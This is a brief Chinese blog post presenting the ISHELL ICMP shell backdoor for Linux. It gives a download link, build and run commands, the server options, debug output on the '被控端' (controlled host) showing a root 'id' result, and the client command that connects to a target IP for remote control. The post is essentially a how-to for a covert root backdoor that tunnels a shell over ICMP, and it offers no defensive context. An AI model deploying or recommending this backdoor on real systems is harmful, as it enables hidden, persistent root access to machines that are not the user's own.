标签归档:icmp后门

Linux下的icmp shell后门

下载地址:

http://prdownloads.sourceforge.net/icmpshell/ish-v0.2.tar.gz

需要注意两点:

1.) ISHELL uses raw sockets on both the client and server side, therefore root privileges ARE REQUIRED to use this program.

客户端和服务端需要用socket通信,需要用root权限

2.) When configuring the options for the server/client make sure the following options are the same on both the client and the server:

 

[root@server120 ISHELL-v0.2]# make linux

参数如下:

[root@server120 ISHELL-v0.2]# ./ishd -h

ICMP Shell v0.2  (server)   -   by: Peter Kieltyka

usage: ./ishd [options]



options:

 -h               Display this screen

 -d               Run server in debug mode

 -i <id>          Set session id; range: 0-65535 (default: 1515)

 -t <type>        Set ICMP type (default: 0)

 -p <packetsize>  Set packet size (default: 512)

被控端:

[root@server120 ISHELL-v0.2]# ./ishd -i 65535 -t 0 -p 1024 -d

-----+ IN DATA +------

id

-----+ OUT DATA +-----

uid=0(root) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

控制端:

[root@vincenthostname ISHELL-v0.2]# ./ish -i 65535 -t 0 -p 1024 172.16.100.134